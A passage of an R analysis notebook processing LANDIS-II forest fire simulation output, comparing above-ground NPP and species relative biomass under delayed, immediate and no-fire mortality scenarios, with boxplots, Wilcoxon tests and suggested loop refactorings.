mod4Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs4)
mod4Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs4)
mod4Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs4)
mod4Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs4)
mod4Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs4)
mod4Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs4)
mod5Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs5)
mod5Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs5)
mod5Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs5)
mod5Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs5)
mod5Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs5)
mod5Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs5)
mod5Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs5)
mod5Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs5)
mod5Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs5)
mod5Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs5)
Stack_C<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_C$model<-"Undisturbed"
Stack_D$value[Stack_D$name=="10 yrs Post-burn"]
boxplot(Stack_D$value[Stack_D$name=="20 yrs Post-burn"],Stack_ND$value[Stack_ND$name=="20 yrs Post-burn"])
NPPStack<-rbind(Stack_D,Stack_ND,Stack_C)
write.csv(NPPStack,"NPPStack_4_28_years.csv")
```
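The fifty `ProcessAG_NPP` calls above apply one template over years 2–11 and five replicate folders, and a manual `rbind` reassembles the results. The same stack can be built by iterating over a (year, run) grid; sketched below with a stand-in function, since `ProcessAG_NPP` itself needs the LANDIS-II rasters on disk:

``` r
# Stand-in with the same signature as ProcessAG_NPP (hypothetical; the real
# function reads NECN and SCRAPPLE rasters from the run folder).
ProcessStub <- function(t, LANDIS_Inputs) data.frame(year = t, run = LANDIS_Inputs)

runs <- paste0("E:/DM_runs_4_4/GA_Model_D", 1:5, "_R2/")
grid <- expand.grid(t = 2:11, run = runs, stringsAsFactors = FALSE)

# One bound frame replaces mod1Year2 ... mod5Year11 and the 10-line rbind().
Stack_D2 <- do.call(rbind, Map(ProcessStub, grid$t, grid$run))
nrow(Stack_D2)  # 50 rows: one per (year, run) pair
```

The same grid, pointed at the ND folders or at `ProcessAG_NPPNF`, covers the `Stack_ND` and `Stack_C` blocks as well.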
``` r
NPPStack<-read.csv("NPPStack_4_28_years.csv")
unique(NPPStack$name)
```
    ## [1] " Pre-burn" " Post-burn" "10 yrs Post-burn" "20 yrs Post-burn"
    ## [5] "30 yrs Post-burn" "40 yrs Post-burn"
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name==" Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 488.4 703.3 778.3 773.5 851.3 971.8
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name==" Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 593.9 769.5 848.5 829.5 902.8 1082.2
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name==" Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 761.7 889.7 960.3 944.4 1009.3 1093.0
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="10 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 550.2 728.7 782.4 783.3 840.3 1002.6
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="10 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 645.9 736.4 844.3 817.1 882.7 941.6
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="10 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 747.1 813.7 916.8 895.4 946.8 1031.1
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="20 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 610.1 732.2 814.8 808.8 888.7 936.4
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="20 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 599.7 822.5 866.7 857.3 909.6 979.2
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="20 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 751.1 908.5 939.5 931.7 969.2 1038.7
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="30 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 620.4 747.5 852.6 832.8 923.0 1046.6
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="30 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 612.8 797.1 887.7 862.5 932.6 1088.5
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="30 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 754.3 835.3 953.2 930.4 1005.9 1069.3
``` r
summary(NPPStack$value[NPPStack$model=="Delay"& NPPStack$name=="40 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 608.8 810.0 897.3 881.3 963.4 1053.1
``` r
summary(NPPStack$value[NPPStack$model=="No Delay"& NPPStack$name=="40 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 698.9 818.1 872.5 881.9 947.0 1134.5
``` r
summary(NPPStack$value[NPPStack$model=="Undisturbed"& NPPStack$name=="40 yrs Post-burn"])
```
    ## Min. 1st Qu. Median Mean 3rd Qu. Max.
    ## 778.6 897.0 984.7 962.4 1013.2 1124.3
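The sixteen `summary()` chunks above slice `NPPStack` one (model, name) pair at a time. `aggregate` produces the same five-number summaries in a single table; a minimal sketch on toy data:

``` r
toy <- data.frame(model = rep(c("Delay", "No Delay"), each = 4),
                  name  = rep(c(" Post-burn", "10 yrs Post-burn"), times = 4),
                  value = 1:8)

# One row of summary statistics per (model, name) combination.
res <- aggregate(value ~ model + name, data = toy, FUN = summary)
nrow(res)  # 4 combinations
```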
``` r
NPPStack$model[NPPStack$model=="No Delay"]<-"Immediate"
NPPStack$model[NPPStack$model=="Undisturbed"]<-"Unburned"
NPPStack$model[NPPStack$model=="Delay"]<-"Delayed"
```
``` r
label.df <- data.frame(Group = c("Preburn"),
Value = c(1200))
#my_comparisons <- list( c("Delayed", "Immediate"))
unique(NPPStack$model)
```
    ## [1] "Delayed" "Immediate" "Unburned"
``` r
NPPStack$value100<-NPPStack$value/100
p1 <- ggboxplot(NPPStack, x="model", y="value100", facet.by="name") +
stat_compare_means(
comparisons = list(c("Delayed", "Immediate"),c("Delayed", "Unburned"),c("Immediate", "Unburned")
),
label = "p.signif",size=5.0)+
ylab("Above Ground NPP Mg/ha/year")+
xlab("")+
theme_classic(base_size = 16)
p1
```
``` r
#getwd()
ggsave('ANPP_Fig.png', p1,width = 10.0,height=10.0,dpi=200)
```
``` r
label.df <- data.frame(Group = c("Preburn"),
Value = c(1200))
#my_comparisons <- list( c("Delayed", "Immediate"))
unique(NPPStack$model)
```
    ## [1] "Delayed" "Immediate" "Unburned"
``` r
NPPStack$value100<-NPPStack$value/100
p1 <- ggboxplot(NPPStack, x="model", y="value100", facet.by="name") +
stat_compare_means(
comparisons = list(c("Delayed", "Immediate"),c("Delayed", "Unburned"),c("Immediate", "Unburned")
),size=5.0)+
ylab("Above Ground NPP Mg/ha/year")+
xlab("")+
theme_classic(base_size = 16)
p1
```
``` r
Biomass<-"E:/DM_Runs_222/GA_Model_D1/Biomass/"
LANDIS_Inputs<-"E:/DM_Runs_222/GA_Model_D1/"
Firemaps<-function(LANDIS_Inputs,t){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
FireOn<-Fire1
FireOn[FireOn<=1]<-NA
FireOn[FireOn>1]<-1
plot(FireOn,ylim=c(0,400),xlim=c(0,400))
FireOff<-Fire1
FireOff[FireOff!=1]<-NA
#plot(FireOff)
return(list(FireOn,FireOff))
}
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
plot(FireOn,col=Greens,ylim=c(0,400),xlim=c(0,400))
# AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+10),".img$"))))
# Bio_sum<-calc(AllStack,sum)  # depends on the AllStack line above, so kept commented out with it
# AcerRubr_perc<-AllStack$AcerRubr.ageclass.12/Bio_sum
#QuerPrin_perc<-AllStack$ /Bio_sum
#LiriTuli_perc<-AllStack$LiriTuli.ageclass.12/Bio_sum
#QuerRubr_perc<-AllStack$QuerRubr.ageclass.12/Bio_sum
#AcerRubr_percOn<-as.data.frame(AcerRubr_perc*FireOn)
#AcerRubr_percOff<-as.data.frame(AcerRubr_perc*FireOff)
#Species<-'AcerRubr'
CalculateFrame<-function(Species,perc,FireOn,FireOff){
#perc<-AcerRubr_perc
One_percOn<-mean((as.vector(perc*FireOn)),na.rm=T)
One_percOff<-mean((as.vector(perc*FireOff)),na.rm=T)
OneSpecies<-data.frame(Species=c(Species,Species),
Fire=c(rep("Fire",length(One_percOn)),
rep("Landscape",length(One_percOff))),
Value=c(One_percOn,One_percOff))
OneSpecies<-na.omit(OneSpecies)
return(OneSpecies)
}
#hist(AcerFrame$Value[AcerFrame$Fire=="Fire"])
#ist(AcerFrame$Value[AcerFrame$Fire=="NoFire"])
# plot(Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$AcerRubr.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$QuerPrin.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$LiriTuli.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
# plot(AllStack$QuerRubr.ageclass.0/Bio_sum,ylim=c(0,400),xlim=c(0,400))
```
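`Firemaps` derives two masks from the ignition-type raster: cells with values above 1 become the burned mask (`FireOn`) and cells equal to 1 become the comparison mask (`FireOff`, later labeled "Landscape"), with everything else set to `NA`. The same logic on a plain matrix, for illustration only (raster objects tolerate `NA`s in a logical replacement index, base matrices need `which()`):

``` r
ign <- matrix(c(0, 1, 2, 3), nrow = 2)  # stand-in for ignition-type values

on <- ign
on[on <= 1] <- NA        # drop cells with no qualifying fire
on[which(on > 1)] <- 1   # burned cells -> 1; which() skips the NAs

off <- ign
off[off != 1] <- NA      # keep only cells equal to 1
```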
``` r
# AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+1),".img$"))))
# df<-NULL
# for(i in 1:length(names(AllStack))){
#
# print(names(AllStack[[i]]))
# bio<-cellStats(AllStack[[i]],stat='sum')
# print(bio)
# row<-data.frame(name=names(AllStack[[i]]),bio=bio)
# df<-rbind(row,df)
# }
```
``` r
### AllFrame1
Sumstack<-function(Biomass,t,stagger,FireOn,FireOff){
AllStack<-stack(paste0(Biomass,list.files(Biomass,pattern = paste0("\\-",(t+stagger),".img$"))))
AllStack<-AllStack[[which(c(grepl("LiriTuli|AcerRubr|NyssSylv|QuerAlba|PinuTaed|QuerPrin|QuerCocc|PinuVirg|PinuStro|QuerRubr|QuerFalc",names(AllStack))))]]
AllStack<-AllStack[[which(c(grepl("ageclass1",names(AllStack))))]]
Bio_sum<-calc(AllStack,sum)
LiriTuli_perc<-AllStack[[which(c(grepl("LiriTuli", names(AllStack), fixed = TRUE)))]]/Bio_sum
LiriTuliFrame<-CalculateFrame("LiriTuli",LiriTuli_perc,FireOn,FireOff)
AcerRubr_perc<-AllStack[[which(c(grepl("AcerRubr", names(AllStack), fixed = TRUE)))]]/Bio_sum
AcerFrame<-CalculateFrame("AcerRubr",AcerRubr_perc,FireOn,FireOff)
NyssSylv_perc<-AllStack[[which(c(grepl("NyssSylv", names(AllStack), fixed = TRUE)))]]/Bio_sum
NyssSylvFrame<-CalculateFrame("NyssSylv",NyssSylv_perc,FireOn,FireOff)
QuerAlba_perc<-AllStack[[which(c(grepl("QuerAlba", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerAlbaFrame<-CalculateFrame("QuerAlba",QuerAlba_perc,FireOn,FireOff)
PinuTaed_perc<-AllStack[[which(c(grepl("PinuTaed", names(AllStack), fixed = TRUE)))]]/Bio_sum
PinuTaedFrame<-CalculateFrame("PinuTaed",PinuTaed_perc,FireOn,FireOff)
QuerPrin_perc<-AllStack[[which(c(grepl("QuerPrin", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerPrinFrame<-CalculateFrame("QuerPrin",QuerPrin_perc,FireOn,FireOff)
QuerCocc_perc<-AllStack[[which(c(grepl("QuerCocc", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerCoccFrame<-CalculateFrame("QuerCocc",QuerCocc_perc,FireOn,FireOff)
PinuVirg_perc<-AllStack[[which(c(grepl("PinuVirg", names(AllStack), fixed = TRUE)))]]/Bio_sum
PinuVirgFrame<-CalculateFrame("PinuVirg",PinuVirg_perc,FireOn,FireOff)
PinuStro_perc<-AllStack[[which(c(grepl("PinuStro", names(AllStack), fixed = TRUE)))]]/Bio_sum
PinuStroFrame<-CalculateFrame("PinuStro",PinuStro_perc,FireOn,FireOff)
QuerRubr_perc<-AllStack[[which(c(grepl("QuerRubr", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerRubrFrame<-CalculateFrame("QuerRubr",QuerRubr_perc,FireOn,FireOff)
QuerFalc_perc<-AllStack[[which(c(grepl("QuerFalc", names(AllStack), fixed = TRUE)))]]/Bio_sum
QuerFalcFrame<-CalculateFrame("QuerFalc",QuerFalc_perc,FireOn,FireOff)
AllFrameThree<-rbind(LiriTuliFrame,AcerFrame,NyssSylvFrame,QuerAlbaFrame,
                     PinuTaedFrame,QuerPrinFrame,QuerCoccFrame,
                     PinuVirgFrame,PinuStroFrame,QuerRubrFrame,QuerFalcFrame)
AllFrameThree<-cbind(data.frame(Time=t,Stagger=stagger),AllFrameThree)
return(AllFrameThree)}
# ptm <- proc.time()
# dfout<-Sumstack(Biomass,2,1)
# proc.time() - ptm
#
#
# dfout<-Sumstack(Biomass,2,1)
#### Stagger 1
Stagger<-function(LANDIS_Inputs,Biomass,Stagger){
Fire2<-Firemaps(LANDIS_Inputs,2)
FireOn<-Fire2[[1]]
FireOff<-Fire2[[2]]
Year2<-Sumstack(Biomass,2,Stagger,FireOn,FireOff)
Fire3<-Firemaps(LANDIS_Inputs,3)
FireOn<-Fire3[[1]]
FireOff<-Fire3[[2]]
Year3<-Sumstack(Biomass,3,Stagger,FireOn,FireOff)
Fire4<-Firemaps(LANDIS_Inputs,4)
FireOn<-Fire4[[1]]
FireOff<-Fire4[[2]]
Year4<-Sumstack(Biomass,4,Stagger,FireOn,FireOff)
Fire5<-Firemaps(LANDIS_Inputs,5)
FireOn<-Fire5[[1]]
FireOff<-Fire5[[2]]
Year5<-Sumstack(Biomass,5,Stagger,FireOn,FireOff)
Fire6<-Firemaps(LANDIS_Inputs,6)
FireOn<-Fire6[[1]]
FireOff<-Fire6[[2]]
Year6<-Sumstack(Biomass,6,Stagger,FireOn,FireOff)
Fire7<-Firemaps(LANDIS_Inputs,7)
FireOn<-Fire7[[1]]
FireOff<-Fire7[[2]]
Year7<-Sumstack(Biomass,7,Stagger,FireOn,FireOff)
Fire8<-Firemaps(LANDIS_Inputs,8)
FireOn<-Fire8[[1]]
FireOff<-Fire8[[2]]
Year8<-Sumstack(Biomass,8,Stagger,FireOn,FireOff)
Fire9<-Firemaps(LANDIS_Inputs,9)
FireOn<-Fire9[[1]]
FireOff<-Fire9[[2]]
Year9<-Sumstack(Biomass,9,Stagger,FireOn,FireOff)
Fire10<-Firemaps(LANDIS_Inputs,10)
FireOn<-Fire10[[1]]
FireOff<-Fire10[[2]]
Year10<-Sumstack(Biomass,10,Stagger,FireOn,FireOff)
Fire11<-Firemaps(LANDIS_Inputs,11)
FireOn<-Fire11[[1]]
FireOff<-Fire11[[2]]
Year11<-Sumstack(Biomass,11,Stagger,FireOn,FireOff)
Stagger1<-rbind(Year2,Year3,Year4,Year5,Year6,Year7,Year8,
Year9,Year10,Year11)
return(Stagger1)
}
```
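Within `Sumstack`, the eleven per-species blocks repeat one extract-and-summarise pattern, and `Stagger` repeats the `Firemaps`/`Sumstack` pair for years 2–11; both are loop-shaped. A sketch with a stand-in for the per-species step (the real code divides the matching raster layer by `Bio_sum` and calls `CalculateFrame`):

``` r
species <- c("LiriTuli", "AcerRubr", "NyssSylv", "QuerAlba", "PinuTaed",
             "QuerPrin", "QuerCocc", "PinuVirg", "PinuStro", "QuerRubr",
             "QuerFalc")

# Hypothetical stand-in for the per-species extraction step.
FrameStub <- function(sp) data.frame(Species = sp, Value = 0)

AllFrame <- do.call(rbind, lapply(species, FrameStub))
nrow(AllFrame)  # 11: one row per species, and no species can be bound twice
```

The year loop in `Stagger` collapses the same way: compute `Firemaps(LANDIS_Inputs, t)` once per `t` inside `lapply(2:11, ...)` and `rbind` the results.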
``` r
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
Stagger1_1<-Stagger(LANDIS_Inputs,Biomass,1)
Stagger1_2<-Stagger(LANDIS_Inputs2,Biomass,1)
Stagger1_3<-Stagger(LANDIS_Inputs3,Biomass,1)
Stagger1_4<-Stagger(LANDIS_Inputs4,Biomass,1)
Stagger1_5<-Stagger(LANDIS_Inputs5,Biomass,1)
Stagger_yr1<-rbind(Stagger1_1,Stagger1_2,Stagger1_3,Stagger1_4,Stagger1_5)
write.csv(Stagger_yr1,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger1_428.csv")
Stagger10_1<-Stagger(LANDIS_Inputs,Biomass,10)
Stagger10_2<-Stagger(LANDIS_Inputs2,Biomass,10)
Stagger10_3<-Stagger(LANDIS_Inputs3,Biomass,10)
Stagger10_4<-Stagger(LANDIS_Inputs4,Biomass,10)
Stagger10_5<-Stagger(LANDIS_Inputs5,Biomass,10)
Stagger_yr10<-rbind(Stagger10_1,Stagger10_2,Stagger10_3,Stagger10_4,Stagger10_5)
write.csv(Stagger_yr10,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger10_428.csv")
###
# Stagger1<-write.csv(Stagger1,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger1.csv")
# Stagger5<-write.csv(Stagger5,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger5.csv")
# Stagger10<-write.csv(Stagger10,"C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger10.csv")
```
``` r
#head(OneRun)
g_legend<-function(a.gplot){
tmp <- ggplot_gtable(ggplot_build(a.gplot))
leg <- which(sapply(tmp$grobs, function(x) x$name) == "guide-box")
legend <- tmp$grobs[[leg]]
return(legend)}
Stagger1<-read.csv("D:/Sapps_DM_paper/Stagger1_428.csv")
#Stagger5<-read.csv("C:/Users/zacha/Desktop/Sapps_DM_paper/Stagger5.csv")
Stagger10<-read.csv("D:/Sapps_DM_paper/Stagger10_428.csv")
Stagger1$Fire[Stagger1$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
Stagger1$Fire[Stagger1$Fire=="Landscape"]<-"Landscape Average"
#Stagger5$Fire[Stagger5$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
#Stagger5$Fire[Stagger5$Fire=="NoFire"]<-"Unburned Landscape"
Stagger10$Fire[Stagger10$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
Stagger10$Fire[Stagger10$Fire=="Landscape"]<-"Landscape Average"
head(Stagger1)
```
    ## X Time Stagger Species Fire Value
    ## 1 1 2 1 LiriTuli Burned Sites (Delayed Mortality) 0.1664392
    ## 2 2 2 1 LiriTuli Landscape Average 0.1674065
    ## 3 3 2 1 AcerRubr Burned Sites (Delayed Mortality) 0.1107812
    ## 4 4 2 1 AcerRubr Landscape Average 0.2468617
    ## 5 5 2 1 NyssSylv Burned Sites (Delayed Mortality) 0.1259665
    ## 6 6 2 1 NyssSylv Landscape Average 0.2284488
``` r
compare_means(Value ~ Fire, data = Stagger1,
group.by = "Species")
```
    ## # A tibble: 11 x 9
    ## Species .y. group1 group2 p p.adj p.format p.signif method
    ## <chr> <chr> <chr> <chr> <dbl> <dbl> <chr> <chr> <chr>
    ## 1 LiriTuli Value Burned Sites~ Landscap~ 0.515 1 0.5147 ns Wilco~
    ## 2 AcerRubr Value Burned Sites~ Landscap~ 0.866 1 0.8659 ns Wilco~
    ## 3 NyssSylv Value Burned Sites~ Landscap~ 0.114 1 0.1136 ns Wilco~
    ## 4 QuerAlba Value Burned Sites~ Landscap~ 0.0316 0.32 0.0316 * Wilco~
    ## 5 PinuTaed Value Burned Sites~ Landscap~ 0.855 1 0.8554 ns Wilco~
    ## 6 QuerPrin Value Burned Sites~ Landscap~ 0.319 1 0.3192 ns Wilco~
    ## 7 QuerCocc Value Burned Sites~ Landscap~ 0.560 1 0.5602 ns Wilco~
    ## 8 PinuVirg Value Burned Sites~ Landscap~ 0.528 1 0.5282 ns Wilco~
    ## 9 PinuStro Value Burned Sites~ Landscap~ 0.00358 0.039 0.0036 ** Wilco~
    ## 10 QuerRubr Value Burned Sites~ Landscap~ 0.391 1 0.3907 ns Wilco~
    ## 11 QuerFalc Value Burned Sites~ Landscap~ 0.839 1 0.8388 ns Wilco~
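`compare_means(Value ~ Fire, group.by = "Species")` runs an unpaired Wilcoxon rank-sum test within each species, which is what the `method` column above reports. The equivalent call in base R, on toy data:

``` r
set.seed(1)
burned    <- rnorm(10, mean = 0.15, sd = 0.03)  # toy relative-biomass values
landscape <- rnorm(10, mean = 0.20, sd = 0.03)

# Unpaired two-sample rank-sum test, the default behind compare_means here.
wt <- wilcox.test(burned, landscape)
wt$p.value
```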
``` r
# compare_means(Value ~ Fire, data = Stagger5,
# group.by = "Species")
compare_means(Value ~ Fire, data = Stagger10,
group.by = "Species")
```
    ## # A tibble: 11 x 9
    ## Species .y. group1 group2 p p.adj p.format p.signif method
    ## <chr> <chr> <chr> <chr> <dbl> <dbl> <chr> <chr> <chr>
    ## 1 LiriTuli Value Burned Sites ~ Landsc~ 8.88e-1 1 0.88761 ns Wilco~
    ## 2 AcerRubr Value Burned Sites ~ Landsc~ 3.72e-1 1 0.37199 ns Wilco~
    ## 3 NyssSylv Value Burned Sites ~ Landsc~ 6.32e-1 1 0.63185 ns Wilco~
    ## 4 QuerAlba Value Burned Sites ~ Landsc~ 9.70e-1 1 0.96979 ns Wilco~
    ## 5 PinuTaed Value Burned Sites ~ Landsc~ 3.85e-4 0.0042 0.00038 *** Wilco~
    ## 6 QuerPrin Value Burned Sites ~ Landsc~ 1.06e-1 0.95 0.10596 ns Wilco~
    ## 7 QuerCocc Value Burned Sites ~ Landsc~ 6.37e-1 1 0.63677 ns Wilco~
    ## 8 PinuVirg Value Burned Sites ~ Landsc~ 8.39e-1 1 0.83885 ns Wilco~
    ## 9 PinuStro Value Burned Sites ~ Landsc~ 1.90e-3 0.019 0.00190 ** Wilco~
    ## 10 QuerRubr Value Burned Sites ~ Landsc~ 7.85e-1 1 0.78539 ns Wilco~
    ## 11 QuerFalc Value Burned Sites ~ Landsc~ 7.91e-1 1 0.79069 ns Wilco~
``` r
#(OneSpecies$Value)
```
``` r
p1 <- ggplot(Stagger1, aes(x=Species, y=Value*100, fill=Fire)) + # fill=Fire gives each group its own color
  ggtitle("Immediately following fire") +
  stat_compare_means(method = "wilcox.test", label = "p.format", size = 6) +
  geom_boxplot(width = .7, outlier.shape = NA) +
  theme_classic(base_size = 24) +
  theme(legend.position = "none") +
  xlab("") +
  ylab("Percent total biomass")
```
``` r
# p2 <- ggplot(Stagger5, aes(x=Species, y=Value, fill=Fire)) + # fill=name allow to automatically dedicate a color for each group
# ggtitle("Relative biomass 5 Years following fire") +
# stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+
# # fill=name allow to automatically dedicate a color for each group
# geom_boxplot(adjust=2, width=.7,outlier.shape = NA)+
# theme_classic(base_size = 24)+
# theme(legend.position="none")+
# xlab("") +
# ylab("Portion of total biomass")
p3 <- ggplot(Stagger10, aes(x=Species, y=Value*100, fill=Fire)) + # fill=Fire gives each group its own color
  ggtitle("10 Years following fire") +
  stat_compare_means(method = "wilcox.test", label = "p.format", size = 6) +
  geom_boxplot(width = .7, outlier.shape = NA) +
  theme_classic(base_size = 24) +
  theme(legend.position = "none") +
  xlab("Species") +
  ylab("Percent total biomass")
```
``` r
p4 <- g_legend(ggplot(Stagger1, aes(x=Species, y=Value, fill=Fire)) +
  ggtitle("Relative biomass immediately following fire") +
  stat_compare_means(method = "wilcox.test", label = "p.format", size = 6) +
  geom_boxplot(width = .7, outlier.shape = NA) +
  theme_classic(base_size = 24) +
  theme(legend.title = element_blank(), axis.text = element_text(size = 18),
        axis.title = element_text(size = 18, face = "bold")))
```
``` r
grid.arrange(p1,p3,p4,nrow =3,top = textGrob("Trees under 20 years old",gp=gpar(fontsize=35,font=1)),heights=c(6,6,1))
```
``` r
# Folder1<-"E:/DM_Runs_222/"
# Csv<-read.csv(paste0(Folder1,"GA_Model_D1/scrapple-events-log.csv"))
# CohortsK<-Csv$CohortsKilled
# CohortsAv<-Csv$AvailableCohorts
CalculatePerc<-function(Csv){
CohortK_s<-sum(Csv$CohortsKilled)
CohortsAv_s<-sum(Csv$AvailableCohorts)
#colnames(Csv)
Perc<-CohortK_s/CohortsAv_s
return(Perc)
}
Folder1<-"D:/Sapps_DM_paper/DM_runs_4_4/"
Csv<-read.csv(paste0(Folder1,"GA_Model_D1_R2/scrapple-events-log.csv"))
Delayed_1<-CalculatePerc(Csv)
D1_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D2_R2/scrapple-events-log.csv"))
Delayed_2<-CalculatePerc(Csv)
D2_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D3_R2/scrapple-events-log.csv"))
Delayed_3<-CalculatePerc(Csv)
D3_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D4_R2/scrapple-events-log.csv"))
Delayed_4<-CalculatePerc(Csv)
D4_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_D5_R2/scrapple-events-log.csv"))
Delayed_5<-CalculatePerc(Csv)
D5_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND1_R2/scrapple-events-log.csv"))
ND_1<-CalculatePerc(Csv)
ND1_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND2_R2/scrapple-events-log.csv"))
ND_2<-CalculatePerc(Csv)
ND2_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND3_R2/scrapple-events-log.csv"))
ND_3<-CalculatePerc(Csv)
ND3_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND4_R2/scrapple-events-log.csv"))
ND_4<-CalculatePerc(Csv)
ND4_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Csv<-read.csv(paste0(Folder1,"GA_Model_ND5_R2/scrapple-events-log.csv"))
ND_5<-CalculatePerc(Csv)
ND5_bio<-sum(Csv$TotalBiomassMortality)*(62500/(24*1e6))
Runs_Bio<-data.frame(Run=c(rep("Delayed Mortality",5),rep("Immediate Mortality",5)),
Value=c(D1_bio,D2_bio,D3_bio,D4_bio,D5_bio,
ND1_bio,ND2_bio,ND3_bio,ND4_bio,ND5_bio))
Runs<-data.frame(Run=c(rep("Delayed Mortality",5),rep("Immediate Mortality",5)),
Value=c(Delayed_1,Delayed_2,Delayed_3,Delayed_4,Delayed_5,
ND_1,ND_2,ND_3,ND_4,ND_5))
#head(data)
min(Runs$Value[Runs$Run=="Delayed Mortality"])
```
    ## [1] 0.3775767
